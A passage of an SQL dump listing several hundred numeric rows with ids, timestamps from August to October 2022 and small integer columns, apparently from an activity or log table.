(2212, '2022-08-16 05:35:47', 1, 2063, 0, 1, 1),
(2213, '2022-08-16 15:49:54', 1, 2055, 0, 1, 1),
(2214, '2022-08-16 20:24:52', 1, 2062, 0, 1, 1),
(2215, '2022-08-16 21:06:06', 1, 2054, 0, 1, 1),
(2216, '2022-08-17 00:22:03', 1, 2054, 0, 1, 1),
(2217, '2022-08-17 12:23:23', 1, 2064, 0, 1, 1),
(2218, '2022-08-18 14:33:30', 1, 2064, 0, 1, 1),
(2219, '2022-08-18 16:37:05', 1, 2062, 0, 1, 1),
(2220, '2022-08-18 17:42:27', 1, 2054, 0, 1, 1),
(2221, '2022-08-18 22:36:11', 1, 2061, 0, 1, 1),
(2222, '2022-08-19 03:38:42', 1, 2061, 0, 1, 1),
(2223, '2022-08-20 05:34:25', 1, 2055, 0, 1, 1),
(2224, '2022-08-20 23:50:33', 1, 2054, 0, 1, 1),
(2225, '2022-08-21 08:58:37', 1, 2062, 0, 1, 1),
(2226, '2022-08-21 12:38:56', 1, 2063, 0, 1, 1),
(2227, '2022-08-21 17:34:28', 1, 2054, 0, 1, 1),
(2228, '2022-08-21 22:39:34', 1, 2060, 0, 1, 1),
(2229, '2022-08-21 22:41:56', 1, 2063, 0, 1, 1),
(2230, '2022-08-21 22:48:22', 1, 2058, 0, 1, 1),
(2231, '2022-08-21 22:59:57', 1, 2055, 0, 1, 1),
(2232, '2022-08-21 23:17:38', 1, 2061, 0, 1, 1),
(2233, '2022-08-21 23:26:59', 1, 2062, 0, 1, 1),
(2234, '2022-08-21 23:44:04', 1, 2054, 0, 1, 1),
(2235, '2022-08-21 23:47:34', 1, 2059, 0, 1, 1),
(2236, '2022-08-21 23:50:10', 1, 2064, 0, 1, 1),
(2237, '2022-08-22 02:08:08', 1, 2059, 0, 1, 1),
(2238, '2022-08-22 05:49:20', 1, 2061, 0, 1, 1),
(2239, '2022-08-22 06:41:37', 1, 2054, 0, 1, 1),
(2240, '2022-08-22 12:14:20', 1, 2054, 0, 1, 1),
(2241, '2022-08-22 12:14:27', 1, 2055, 0, 1, 1),
(2242, '2022-08-22 12:14:57', 1, 2064, 0, 1, 1),
(2243, '2022-08-22 12:15:03', 1, 2063, 0, 1, 1),
(2244, '2022-08-22 12:15:07', 1, 2062, 0, 1, 1),
(2245, '2022-08-22 12:15:12', 1, 2060, 0, 1, 1),
(2246, '2022-08-22 12:15:19', 1, 2059, 0, 1, 1),
(2247, '2022-08-22 12:15:31', 1, 2061, 0, 1, 1),
(2248, '2022-08-22 12:15:39', 1, 2058, 0, 1, 1),
(2249, '2022-08-22 19:29:52', 1, 2053, 0, 1, 1),
(2250, '2022-08-22 20:41:37', 1, 2061, 0, 1, 1),
(2251, '2022-08-23 05:14:41', 1, 2058, 0, 1, 1),
(2252, '2022-08-23 05:47:36', 1, 2060, 0, 1, 1),
(2253, '2022-08-23 05:52:58', 1, 2060, 0, 1, 1),
(2254, '2022-08-23 07:32:49', 1, 2061, 0, 1, 1),
(2255, '2022-08-23 10:38:55', 1, 2064, 0, 1, 1),
(2256, '2022-08-23 19:28:29', 1, 2055, 0, 1, 1),
(2257, '2022-08-23 20:42:07', 1, 2062, 0, 1, 1),
(2258, '2022-08-24 01:49:28', 1, 2055, 0, 1, 1),
(2259, '2022-08-24 04:04:01', 1, 2062, 0, 1, 1),
(2260, '2022-08-24 04:25:37', 1, 2061, 0, 1, 1),
(2261, '2022-08-24 14:34:57', 1, 2061, 0, 1, 1),
(2262, '2022-08-25 13:20:56', 1, 2055, 0, 1, 1),
(2263, '2022-08-26 12:49:41', 1, 2055, 0, 1, 1),
(2264, '2022-08-27 02:49:40', 1, 2059, 0, 1, 1),
(2265, '2022-08-27 12:25:09', 1, 2054, 0, 1, 1),
(2266, '2022-08-27 17:14:38', 1, 2059, 0, 1, 1),
(2267, '2022-08-27 20:59:37', 1, 2055, 0, 1, 1),
(2268, '2022-08-27 23:24:45', 1, 2054, 0, 1, 1),
(2269, '2022-08-28 01:57:46', 1, 2062, 0, 1, 1),
(2270, '2022-08-28 04:33:45', 1, 2064, 459, 1, 1),
(2271, '2022-08-28 04:35:03', 1, 2064, 459, 1, 1),
(2272, '2022-08-28 04:36:02', 1, 2064, 459, 1, 1),
(2273, '2022-08-28 20:05:02', 1, 2061, 0, 1, 1),
(2274, '2022-08-29 00:20:56', 1, 2060, 0, 1, 1),
(2275, '2022-08-29 00:22:45', 1, 2063, 0, 1, 1),
(2276, '2022-08-29 00:27:16', 1, 2058, 0, 1, 1),
(2277, '2022-08-29 00:35:26', 1, 2055, 0, 1, 1),
(2278, '2022-08-29 00:46:59', 1, 2061, 0, 1, 1),
(2279, '2022-08-29 00:53:48', 1, 2062, 0, 1, 1),
(2280, '2022-08-29 01:05:01', 1, 2054, 0, 1, 1),
(2281, '2022-08-29 01:07:10', 1, 2059, 0, 1, 1),
(2282, '2022-08-29 01:09:06', 1, 2064, 0, 1, 1),
(2283, '2022-08-29 04:37:08', 1, 2061, 0, 1, 1),
(2284, '2022-08-29 12:23:18', 1, 2061, 0, 1, 1),
(2285, '2022-08-29 16:16:06', 1, 2064, 0, 1, 1),
(2286, '2022-08-29 18:40:34', 1, 2054, 0, 1, 1),
(2287, '2022-08-30 03:27:51', 1, 2064, 0, 1, 1),
(2288, '2022-08-30 14:24:37', 1, 2064, 0, 1, 1),
(2289, '2022-08-30 20:12:17', 1, 2061, 0, 1, 1),
(2290, '2022-08-31 01:44:58', 1, 2063, 0, 1, 1),
(2291, '2022-08-31 02:54:20', 1, 2058, 0, 1, 1),
(2292, '2022-08-31 13:06:54', 1, 2060, 0, 1, 1),
(2293, '2022-08-31 15:48:26', 1, 2062, 0, 1, 1),
(2294, '2022-08-31 15:48:54', 4, 2062, 467, 1, 1),
(2295, '2022-08-31 15:49:50', 1, 2063, 467, 1, 1),
(2296, '2022-09-01 14:13:37', 1, 2054, 0, 1, 1),
(2297, '2022-09-01 14:15:18', 1, 2055, 0, 1, 1),
(2298, '2022-09-01 14:18:25', 1, 2058, 0, 1, 1),
(2299, '2022-09-01 14:22:02', 1, 2061, 0, 1, 1),
(2300, '2022-09-01 14:22:11', 1, 2060, 0, 1, 1),
(2301, '2022-09-01 14:25:05', 1, 2059, 0, 1, 1),
(2302, '2022-09-01 14:25:33', 1, 2063, 0, 1, 1),
(2303, '2022-09-01 14:27:40', 1, 2062, 0, 1, 1),
(2304, '2022-09-01 14:30:18', 1, 2064, 0, 1, 1),
(2305, '2022-09-01 21:17:50', 1, 2059, 0, 1, 1),
(2306, '2022-09-02 12:52:06', 1, 2054, 0, 1, 1),
(2307, '2022-09-02 21:58:00', 1, 2055, 0, 1, 1),
(2308, '2022-09-03 06:03:57', 1, 2061, 0, 1, 1),
(2309, '2022-09-03 14:25:36', 1, 2062, 0, 1, 1),
(2310, '2022-09-04 10:28:10', 1, 2064, 0, 1, 1),
(2311, '2022-09-04 10:28:26', 1, 2063, 0, 1, 1),
(2312, '2022-09-04 10:28:41', 1, 2062, 0, 1, 1),
(2313, '2022-09-04 10:28:52', 1, 2061, 0, 1, 1),
(2314, '2022-09-04 10:29:04', 1, 2060, 0, 1, 1),
(2315, '2022-09-04 10:29:20', 1, 2059, 0, 1, 1),
(2316, '2022-09-04 10:29:33', 1, 2058, 0, 1, 1),
(2317, '2022-09-04 10:29:47', 1, 2055, 0, 1, 1),
(2318, '2022-09-04 10:30:00', 1, 2054, 0, 1, 1),
(2319, '2022-09-04 10:45:03', 1, 2053, 0, 1, 1),
(2320, '2022-09-04 15:01:10', 1, 2061, 0, 1, 1),
(2321, '2022-09-04 16:03:47', 1, 2064, 0, 1, 1),
(2322, '2022-09-05 02:21:30', 1, 2060, 0, 1, 1),
(2323, '2022-09-05 02:22:57', 1, 2063, 0, 1, 1),
(2324, '2022-09-05 02:26:44', 1, 2058, 0, 1, 1),
(2325, '2022-09-05 02:33:42', 1, 2055, 0, 1, 1),
(2326, '2022-09-05 02:45:04', 1, 2061, 0, 1, 1),
(2327, '2022-09-05 02:51:39', 1, 2062, 0, 1, 1),
(2328, '2022-09-05 03:02:54', 1, 2054, 0, 1, 1),
(2329, '2022-09-05 03:05:22', 1, 2059, 0, 1, 1),
(2330, '2022-09-05 03:07:18', 1, 2064, 0, 1, 1),
(2331, '2022-09-05 18:28:16', 1, 2064, 0, 1, 1),
(2332, '2022-09-06 12:43:22', 1, 2053, 0, 1, 1),
(2333, '2022-09-06 12:43:27', 1, 2054, 0, 1, 1),
(2334, '2022-09-06 12:43:30', 1, 2055, 0, 1, 1),
(2335, '2022-09-06 12:43:42', 1, 2064, 0, 1, 1),
(2336, '2022-09-06 12:43:48', 1, 2063, 0, 1, 1),
(2337, '2022-09-06 12:43:52', 1, 2062, 0, 1, 1),
(2338, '2022-09-06 12:43:56', 1, 2060, 0, 1, 1),
(2339, '2022-09-06 12:44:00', 1, 2059, 0, 1, 1),
(2340, '2022-09-06 12:44:03', 1, 2061, 0, 1, 1),
(2341, '2022-09-06 12:44:07', 1, 2058, 0, 1, 1),
(2342, '2022-09-06 16:22:42', 1, 2063, 0, 1, 1),
(2343, '2022-09-06 16:22:44', 1, 2058, 0, 1, 1),
(2344, '2022-09-06 20:03:39', 1, 2061, 0, 1, 1),
(2345, '2022-09-07 05:29:45', 1, 2061, 0, 1, 1),
(2346, '2022-09-07 15:55:07', 1, 2061, 0, 1, 1),
(2347, '2022-09-08 02:44:58', 1, 2061, 0, 1, 1),
(2348, '2022-09-09 02:12:38', 1, 2055, 0, 1, 1),
(2349, '2022-09-09 06:10:26', 1, 2062, 0, 1, 1),
(2350, '2022-09-09 14:46:37', 1, 2061, 0, 1, 1),
(2351, '2022-09-09 17:04:28', 1, 2054, 0, 1, 1),
(2352, '2022-09-09 21:13:22', 1, 2054, 0, 1, 1),
(2353, '2022-09-10 15:03:06', 1, 2059, 0, 1, 1),
(2354, '2022-09-10 17:16:32', 1, 2059, 0, 1, 1),
(2355, '2022-09-10 18:01:32', 1, 2059, 0, 1, 1),
(2356, '2022-09-11 09:27:47', 1, 2064, 0, 1, 1),
(2357, '2022-09-11 23:37:02', 1, 2061, 0, 1, 1),
(2358, '2022-09-12 03:23:46', 1, 2060, 0, 1, 1),
(2359, '2022-09-12 03:25:13', 1, 2063, 0, 1, 1),
(2360, '2022-09-12 03:28:54', 1, 2058, 0, 1, 1),
(2361, '2022-09-12 03:34:58', 1, 2055, 0, 1, 1),
(2362, '2022-09-12 03:44:40', 1, 2061, 0, 1, 1),
(2363, '2022-09-12 03:50:46', 1, 2060, 0, 1, 1),
(2364, '2022-09-12 03:52:02', 1, 2063, 0, 1, 1),
(2365, '2022-09-12 03:54:57', 1, 2058, 0, 1, 1),
(2366, '2022-09-12 04:00:27', 1, 2055, 0, 1, 1),
(2367, '2022-09-12 04:09:58', 1, 2061, 0, 1, 1),
(2368, '2022-09-12 04:15:23', 1, 2062, 0, 1, 1),
(2369, '2022-09-12 04:25:21', 1, 2054, 0, 1, 1),
(2370, '2022-09-12 04:27:23', 1, 2059, 0, 1, 1),
(2371, '2022-09-12 04:29:04', 1, 2064, 0, 1, 1),
(2372, '2022-09-12 11:30:08', 1, 2064, 0, 1, 1),
(2373, '2022-09-12 20:33:18', 1, 2061, 0, 1, 1),
(2374, '2022-09-12 20:41:11', 1, 2054, 0, 1, 1),
(2375, '2022-09-12 21:51:31', 1, 2059, 0, 1, 1),
(2376, '2022-09-13 07:22:46', 1, 2064, 0, 1, 1),
(2377, '2022-09-13 09:51:21', 1, 2064, 0, 1, 1),
(2378, '2022-09-14 06:44:14', 1, 2062, 0, 1, 1),
(2379, '2022-09-14 20:36:38', 1, 2061, 0, 1, 1),
(2380, '2022-09-14 22:07:10', 1, 2054, 0, 1, 1),
(2381, '2022-09-15 03:44:31', 1, 2059, 0, 1, 1),
(2382, '2022-09-15 05:01:08', 1, 2064, 0, 1, 1),
(2383, '2022-09-15 19:27:03', 1, 2062, 0, 1, 1),
(2384, '2022-09-15 21:26:53', 1, 2061, 0, 1, 1),
(2385, '2022-09-16 02:42:11', 1, 2064, 0, 1, 1),
(2386, '2022-09-16 06:11:01', 1, 2061, 0, 1, 1),
(2387, '2022-09-16 22:50:36', 1, 2059, 0, 1, 1),
(2388, '2022-09-16 23:23:13', 1, 2063, 0, 1, 1),
(2389, '2022-09-17 02:10:32', 1, 2054, 0, 1, 1),
(2390, '2022-09-17 08:32:30', 1, 2063, 0, 1, 1),
(2391, '2022-09-17 13:54:14', 1, 2061, 0, 1, 1),
(2392, '2022-09-17 15:26:17', 1, 2062, 0, 1, 1),
(2393, '2022-09-17 15:47:47', 1, 2059, 0, 1, 1),
(2394, '2022-09-17 17:21:58', 1, 2055, 0, 1, 1),
(2395, '2022-09-17 22:30:24', 1, 2064, 0, 1, 1),
(2396, '2022-09-17 22:45:41', 1, 2062, 0, 1, 1),
(2397, '2022-09-18 03:39:14', 1, 2058, 0, 1, 1),
(2398, '2022-09-18 14:59:55', 1, 2063, 0, 1, 1),
(2399, '2022-09-18 17:21:56', 1, 2064, 0, 1, 1),
(2400, '2022-09-18 22:37:29', 1, 2055, 0, 1, 1),
(2401, '2022-09-18 22:54:20', 1, 2059, 0, 1, 1),
(2402, '2022-09-19 06:02:06', 1, 2060, 0, 1, 1),
(2403, '2022-09-19 06:03:47', 1, 2063, 0, 1, 1),
(2404, '2022-09-19 06:07:46', 1, 2058, 0, 1, 1),
(2405, '2022-09-19 06:14:47', 1, 2055, 0, 1, 1),
(2406, '2022-09-19 06:27:05', 1, 2061, 0, 1, 1),
(2407, '2022-09-19 06:33:34', 1, 2062, 0, 1, 1),
(2408, '2022-09-19 06:45:00', 1, 2054, 0, 1, 1),
(2409, '2022-09-19 06:47:20', 1, 2059, 0, 1, 1),
(2410, '2022-09-19 06:49:10', 1, 2064, 0, 1, 1),
(2411, '2022-09-19 07:51:01', 1, 2064, 0, 1, 1),
(2412, '2022-09-19 07:51:07', 1, 2064, 0, 1, 1),
(2413, '2022-09-19 14:56:22', 1, 2058, 0, 1, 1),
(2414, '2022-09-19 16:10:25', 1, 2064, 0, 1, 1),
(2415, '2022-09-19 20:10:08', 1, 2054, 0, 1, 1),
(2416, '2022-09-20 02:40:18', 1, 2054, 0, 1, 1),
(2417, '2022-09-20 02:40:19', 1, 2062, 0, 1, 1),
(2418, '2022-09-20 02:40:19', 1, 2064, 0, 1, 1),
(2419, '2022-09-20 02:40:20', 1, 2063, 0, 1, 1),
(2420, '2022-09-20 02:40:21', 1, 2058, 0, 1, 1),
(2421, '2022-09-20 02:40:21', 1, 2059, 0, 1, 1),
(2422, '2022-09-20 02:40:23', 1, 2055, 0, 1, 1),
(2423, '2022-09-20 02:40:27', 1, 2060, 0, 1, 1),
(2424, '2022-09-20 02:40:29', 1, 2061, 0, 1, 1),
(2425, '2022-09-20 04:10:51', 1, 2064, 0, 1, 1),
(2426, '2022-09-20 04:10:53', 1, 2064, 0, 1, 1),
(2427, '2022-09-20 04:13:03', 1, 2064, 0, 1, 1),
(2428, '2022-09-20 04:13:04', 1, 2064, 0, 1, 1),
(2429, '2022-09-20 04:13:06', 1, 2064, 0, 1, 1),
(2430, '2022-09-20 04:13:07', 1, 2064, 0, 1, 1),
(2431, '2022-09-20 04:13:08', 1, 2064, 0, 1, 1),
(2432, '2022-09-20 04:14:10', 1, 2064, 489, 1, 1),
(2433, '2022-09-20 16:12:45', 1, 2054, 0, 1, 1),
(2434, '2022-09-21 14:19:12', 1, 2063, 0, 1, 1),
(2435, '2022-09-21 16:08:25', 1, 2054, 0, 1, 1),
(2436, '2022-09-21 16:08:55', 1, 2055, 0, 1, 1),
(2437, '2022-09-21 16:10:53', 1, 2064, 0, 1, 1),
(2438, '2022-09-21 16:11:24', 1, 2063, 0, 1, 1),
(2439, '2022-09-21 16:11:54', 1, 2062, 0, 1, 1),
(2440, '2022-09-21 16:12:24', 1, 2060, 0, 1, 1),
(2441, '2022-09-21 16:12:54', 1, 2059, 0, 1, 1),
(2442, '2022-09-21 16:13:25', 1, 2061, 0, 1, 1),
(2443, '2022-09-21 16:13:55', 1, 2058, 0, 1, 1),
(2444, '2022-09-21 22:31:59', 1, 2062, 0, 1, 1),
(2445, '2022-09-22 03:12:28', 1, 2053, 0, 1, 1),
(2446, '2022-09-22 09:35:04', 1, 2064, 0, 1, 1),
(2447, '2022-09-22 10:52:38', 1, 2063, 0, 1, 1),
(2448, '2022-09-22 11:18:00', 1, 2064, 0, 1, 1),
(2449, '2022-09-22 11:34:52', 1, 2063, 0, 1, 1),
(2450, '2022-09-22 12:51:00', 1, 2055, 0, 1, 1),
(2451, '2022-09-22 14:18:40', 1, 2061, 0, 1, 1),
(2452, '2022-09-22 15:12:23', 1, 2061, 0, 1, 1),
(2453, '2022-09-22 15:48:40', 1, 2054, 0, 1, 1),
(2454, '2022-09-22 20:02:03', 1, 2059, 0, 1, 1),
(2455, '2022-09-22 21:55:19', 1, 2053, 0, 1, 1),
(2456, '2022-09-23 03:06:13', 1, 2062, 0, 1, 1),
(2457, '2022-09-23 12:09:13', 1, 2053, 0, 1, 1),
(2458, '2022-09-23 20:11:07', 1, 2064, 0, 1, 1),
(2459, '2022-09-23 21:45:06', 1, 2061, 0, 1, 1),
(2460, '2022-09-24 00:34:11', 1, 2055, 0, 1, 1),
(2461, '2022-09-24 01:56:53', 1, 2062, 0, 1, 1),
(2462, '2022-09-24 02:38:49', 1, 2053, 0, 1, 1),
(2463, '2022-09-24 04:10:59', 1, 2062, 0, 1, 1),
(2464, '2022-09-24 05:15:46', 1, 2063, 0, 1, 1),
(2465, '2022-09-24 05:15:53', 1, 2063, 0, 1, 1),
(2466, '2022-09-24 09:33:46', 1, 2063, 0, 1, 1),
(2467, '2022-09-24 09:39:42', 1, 2062, 0, 1, 1),
(2468, '2022-09-24 09:39:49', 1, 2060, 0, 1, 1),
(2469, '2022-09-24 09:39:54', 1, 2059, 0, 1, 1),
(2470, '2022-09-24 11:35:28', 1, 2064, 0, 1, 1),
(2471, '2022-09-25 03:34:37', 1, 2058, 0, 1, 1),
(2472, '2022-09-25 09:37:47', 1, 2058, 0, 1, 1),
(2473, '2022-09-25 09:37:53', 1, 2064, 0, 1, 1),
(2474, '2022-09-25 11:32:49', 1, 2059, 0, 1, 1),
(2475, '2022-09-25 19:32:30', 1, 2064, 0, 1, 1),
(2476, '2022-09-25 23:05:38', 1, 2063, 0, 1, 1),
(2477, '2022-09-26 01:21:38', 1, 2063, 0, 1, 1),
(2478, '2022-09-26 01:21:39', 1, 2063, 0, 1, 1),
(2479, '2022-09-26 13:23:50', 1, 2064, 0, 1, 1),
(2480, '2022-09-26 15:03:29', 1, 2061, 0, 1, 1),
(2481, '2022-09-27 03:04:29', 1, 2064, 0, 1, 1),
(2482, '2022-09-27 03:21:12', 1, 2062, 0, 1, 1),
(2483, '2022-09-27 05:15:54', 1, 2054, 0, 1, 1),
(2484, '2022-09-27 11:15:01', 1, 2059, 0, 1, 1),
(2485, '2022-09-27 12:13:05', 1, 2063, 0, 1, 1),
(2486, '2022-09-27 13:05:42', 1, 2062, 0, 1, 1),
(2487, '2022-09-27 13:05:44', 1, 2063, 0, 1, 1),
(2488, '2022-09-27 13:18:50', 1, 2061, 0, 1, 1),
(2489, '2022-09-27 13:18:55', 4, 2061, 507, 1, 1),
(2490, '2022-09-27 15:18:43', 1, 2054, 0, 1, 1),
(2491, '2022-09-27 22:21:11', 1, 2054, 0, 1, 1),
(2492, '2022-09-28 04:43:48', 1, 2061, 0, 1, 1),
(2493, '2022-09-28 07:25:42', 1, 2054, 0, 1, 1),
(2494, '2022-09-28 08:57:33', 1, 2061, 0, 1, 1),
(2495, '2022-09-29 05:22:04', 1, 2064, 0, 1, 1),
(2496, '2022-09-29 12:09:03', 1, 2062, 0, 1, 1),
(2497, '2022-09-29 12:33:08', 1, 2061, 0, 1, 1),
(2498, '2022-09-29 15:17:35', 1, 2064, 0, 1, 1),
(2499, '2022-09-30 01:20:14', 1, 2060, 0, 1, 1),
(2500, '2022-09-30 01:20:24', 1, 2063, 0, 1, 1),
(2501, '2022-09-30 01:20:32', 1, 2058, 0, 1, 1),
(2502, '2022-09-30 01:27:44', 1, 2055, 0, 1, 1),
(2503, '2022-09-30 01:29:20', 1, 2053, 0, 1, 1),
(2504, '2022-09-30 01:42:20', 1, 2061, 0, 1, 1),
(2505, '2022-09-30 01:50:15', 1, 2062, 0, 1, 1),
(2506, '2022-09-30 02:06:16', 1, 2054, 0, 1, 1),
(2507, '2022-09-30 02:09:45', 1, 2059, 0, 1, 1),
(2508, '2022-09-30 02:12:33', 1, 2064, 0, 1, 1),
(2509, '2022-09-30 10:57:39', 1, 2060, 0, 1, 1),
(2510, '2022-09-30 11:06:56', 1, 2061, 0, 1, 1),
(2511, '2022-09-30 11:16:18', 1, 2059, 0, 1, 1),
(2512, '2022-09-30 11:24:44', 1, 2064, 0, 1, 1),
(2513, '2022-09-30 11:32:11', 1, 2062, 0, 1, 1),
(2514, '2022-09-30 11:43:47', 1, 2055, 0, 1, 1),
(2515, '2022-09-30 11:53:53', 1, 2063, 0, 1, 1),
(2516, '2022-09-30 11:56:52', 1, 2058, 0, 1, 1),
(2517, '2022-09-30 15:37:58', 1, 2060, 0, 1, 1),
(2518, '2022-10-01 05:21:59', 1, 2062, 0, 1, 1),
(2519, '2022-10-01 11:36:01', 1, 2059, 0, 1, 1),
(2520, '2022-10-01 11:40:29', 1, 2059, 0, 1, 1),
(2521, '2022-10-01 19:03:06', 1, 2061, 0, 1, 1),
(2522, '2022-10-01 23:56:12', 1, 2054, 0, 1, 1),
(2523, '2022-10-01 23:56:15', 1, 2055, 0, 1, 1),
(2524, '2022-10-01 23:56:22', 1, 2064, 0, 1, 1),
(2525, '2022-10-01 23:56:24', 1, 2063, 0, 1, 1),
(2526, '2022-10-01 23:56:25', 1, 2062, 0, 1, 1),
(2527, '2022-10-01 23:56:27', 1, 2060, 0, 1, 1),
(2528, '2022-10-01 23:56:28', 1, 2059, 0, 1, 1),
(2529, '2022-10-01 23:56:30', 1, 2061, 0, 1, 1),
(2530, '2022-10-01 23:56:32', 1, 2058, 0, 1, 1),
(2531, '2022-10-03 04:22:44', 1, 2059, 0, 1, 1),
(2532, '2022-10-03 07:32:00', 1, 2058, 0, 1, 1),
(2533, '2022-10-03 10:52:49', 1, 2062, 0, 1, 1),
(2534, '2022-10-03 19:37:16', 1, 2064, 0, 1, 1),
(2535, '2022-10-03 19:37:18', 1, 2055, 0, 1, 1),
(2536, '2022-10-04 02:49:05', 1, 2062, 0, 1, 1),
(2537, '2022-10-04 03:34:23', 1, 2054, 0, 1, 1),
(2538, '2022-10-04 03:51:50', 1, 2055, 0, 1, 1),
(2539, '2022-10-04 05:33:00', 1, 2058, 0, 1, 1),
(2540, '2022-10-04 05:43:27', 1, 2061, 0, 1, 1),
(2541, '2022-10-04 07:37:52', 1, 2064, 0, 1, 1),
(2542, '2022-10-04 16:49:42', 1, 2059, 0, 1, 1),
(2543, '2022-10-04 17:47:56', 1, 2064, 0, 1, 1),
(2544, '2022-10-04 20:39:00', 1, 2054, 0, 1, 1),
(2545, '2022-10-04 22:45:01', 1, 2061, 0, 1, 1),
(2546, '2022-10-05 03:03:35', 1, 2063, 0, 1, 1),
(2547, '2022-10-05 03:03:37', 1, 2063, 0, 1, 1),
(2548, '2022-10-05 10:55:19', 1, 2063, 0, 1, 1),
(2549, '2022-10-05 10:58:07', 1, 2058, 0, 1, 1),
(2550, '2022-10-05 10:58:09', 1, 2058, 0, 1, 1),
(2551, '2022-10-05 12:03:56', 1, 2060, 0, 1, 1),
(2552, '2022-10-05 12:06:50', 1, 2060, 0, 1, 1),
(2553, '2022-10-05 22:38:14', 1, 2055, 0, 1, 1),
(2554, '2022-10-06 13:45:03', 1, 2053, 0, 1, 1),
(2555, '2022-10-06 14:46:52', 1, 2062, 0, 1, 1),
(2556, '2022-10-06 18:09:02', 1, 2058, 0, 1, 1),
(2557, '2022-10-06 22:03:54', 1, 2062, 0, 1, 1),
(2558, '2022-10-06 22:05:25', 1, 2063, 0, 1, 1),
(2559, '2022-10-06 22:05:52', 1, 2061, 0, 1, 1),
(2560, '2022-10-06 22:06:08', 1, 2059, 0, 1, 1),
(2561, '2022-10-06 22:06:33', 1, 2058, 0, 1, 1),
(2562, '2022-10-06 22:07:06', 1, 2055, 0, 1, 1),
(2563, '2022-10-07 00:15:16', 1, 2063, 0, 1, 1),
(2564, '2022-10-07 11:20:33', 1, 2054, 0, 1, 1),
(2565, '2022-10-07 11:20:51', 1, 2055, 0, 1, 1),
(2566, '2022-10-07 11:22:01', 1, 2064, 0, 1, 1),
(2567, '2022-10-07 11:22:19', 1, 2063, 0, 1, 1),
(2568, '2022-10-07 11:22:36', 1, 2062, 0, 1, 1),
(2569, '2022-10-07 11:22:54', 1, 2060, 0, 1, 1),
(2570, '2022-10-07 11:23:12', 1, 2059, 0, 1, 1),
(2571, '2022-10-07 11:23:29', 1, 2061, 0, 1, 1),
(2572, '2022-10-07 11:23:47', 1, 2058, 0, 1, 1),
(2573, '2022-10-07 18:45:06', 1, 2054, 0, 1, 1),
(2574, '2022-10-07 18:45:49', 1, 2060, 0, 1, 1),
(2575, '2022-10-07 22:13:41', 1, 2061, 0, 1, 1),
(2576, '2022-10-07 22:13:50', 4, 2061, 524, 1, 1),
(2577, '2022-10-08 04:10:05', 1, 2059, 0, 1, 1),
(2578, '2022-10-08 04:17:13', 1, 2061, 0, 1, 1),
(2579, '2022-10-08 04:28:14', 1, 2055, 0, 1, 1),
(2580, '2022-10-08 04:33:38', 1, 2061, 0, 1, 1),
(2581, '2022-10-08 05:09:53', 1, 2061, 0, 1, 1),
(2582, '2022-10-08 06:41:36', 1, 2063, 0, 1, 1),
(2583, '2022-10-08 06:45:26', 1, 2062, 0, 1, 1),
(2584, '2022-10-08 06:46:41', 1, 2062, 0, 1, 1),
(2585, '2022-10-08 10:06:51', 1, 2053, 0, 1, 1),
(2586, '2022-10-08 16:06:59', 1, 2061, 0, 1, 1),
(2587, '2022-10-08 16:38:01', 1, 2061, 0, 1, 1),
(2588, '2022-10-08 16:38:02', 4, 2061, 531, 1, 1),
(2589, '2022-10-08 21:24:08', 1, 2064, 0, 1, 1),
(2590, '2022-10-09 04:33:52', 1, 2064, 0, 1, 1),
(2591, '2022-10-09 05:08:48', 1, 2054, 0, 1, 1),
(2592, '2022-10-09 05:40:42', 1, 2061, 0, 1, 1),
(2593, '2022-10-09 07:09:48', 1, 2064, 0, 1, 1),
(2594, '2022-10-09 09:22:07', 1, 2064, 0, 1, 1),
(2595, '2022-10-09 16:00:41', 1, 2064, 0, 1, 1),
(2596, '2022-10-09 16:01:48', 1, 2064, 0, 1, 1),
(2597, '2022-10-09 17:15:47', 1, 2059, 0, 1, 1),
(2598, '2022-10-10 04:38:44', 1, 2063, 0, 1, 1),
(2599, '2022-10-10 04:39:05', 1, 2063, 0, 1, 1),
(2600, '2022-10-10 06:34:00', 1, 2064, 0, 1, 1),
(2601, '2022-10-10 06:34:29', 1, 2064, 0, 1, 1),
(2602, '2022-10-10 09:33:04', 1, 2062, 0, 1, 1),
(2603, '2022-10-10 09:51:15', 1, 2061, 0, 1, 1),
(2604, '2022-10-10 13:00:42', 1, 2055, 0, 1, 1),
(2605, '2022-10-10 13:30:14', 1, 2054, 0, 1, 1),
(2606, '2022-10-10 14:38:35', 1, 2064, 0, 1, 1),
(2607, '2022-10-10 18:28:16', 1, 2061, 0, 1, 1),
(2608, '2022-10-10 20:01:25', 1, 2061, 0, 1, 1),
(2609, '2022-10-10 20:16:05', 1, 2059, 0, 1, 1),
(2610, '2022-10-10 20:41:05', 1, 2055, 0, 1, 1),
(2611, '2022-10-10 20:52:31', 1, 2061, 0, 1, 1),
(2612, '2022-10-10 20:55:44', 1, 2059, 0, 1, 1),
(2613, '2022-10-10 21:24:40', 1, 2054, 0, 1, 1),
(2614, '2022-10-11 18:40:50', 1, 2054, 0, 1, 1),
(2615, '2022-10-11 21:11:00', 1, 2064, 0, 1, 1),
(2616, '2022-10-12 07:11:16', 1, 2058, 0, 1, 1),
(2617, '2022-10-12 19:19:59', 1, 2058, 0, 1, 1),
(2618, '2022-10-13 00:41:49', 1, 2064, 0, 1, 1),
(2619, '2022-10-13 11:17:51', 1, 2060, 0, 1, 1),
(2620, '2022-10-13 15:11:29', 1, 2055, 0, 1, 1),
(2621, '2022-10-13 19:04:08', 1, 2064, 0, 1, 1),
(2622, '2022-10-14 04:33:43', 1, 2055, 0, 1, 1),
(2623, '2022-10-14 04:33:47', 1, 2064, 0, 1, 1),
(2624, '2022-10-14 04:33:51', 1, 2061, 0, 1, 1),
(2625, '2022-10-14 04:33:54', 1, 2058, 0, 1, 1),
(2626, '2022-10-14 10:22:17', 1, 2054, 0, 1, 1),
(2627, '2022-10-14 14:21:55', 1, 2058, 0, 1, 1),
(2628, '2022-10-14 14:34:43', 1, 2061, 0, 1, 1),
(2629, '2022-10-14 15:06:11', 1, 2064, 0, 1, 1),
(2630, '2022-10-14 20:31:06', 1, 2060, 0, 1, 1),
(2631, '2022-10-14 20:45:23', 1, 2054, 0, 1, 1),
(2632, '2022-10-14 23:18:47', 1, 2064, 0, 1, 1),
(2633, '2022-10-15 06:56:16', 1, 2063, 0, 1, 1),
(2634, '2022-10-15 17:08:24', 1, 2060, 0, 1, 1),
(2635, '2022-10-15 18:22:44', 1, 2063, 0, 1, 1),
(2636, '2022-10-15 22:43:48', 1, 2055, 0, 1, 1),
(2637, '2022-10-16 01:30:23', 1, 2064, 0, 1, 1),
(2638, '2022-10-16 03:57:54', 1, 2062, 0, 1, 1),
(2639, '2022-10-16 06:40:19', 1, 2063, 0, 1, 1),
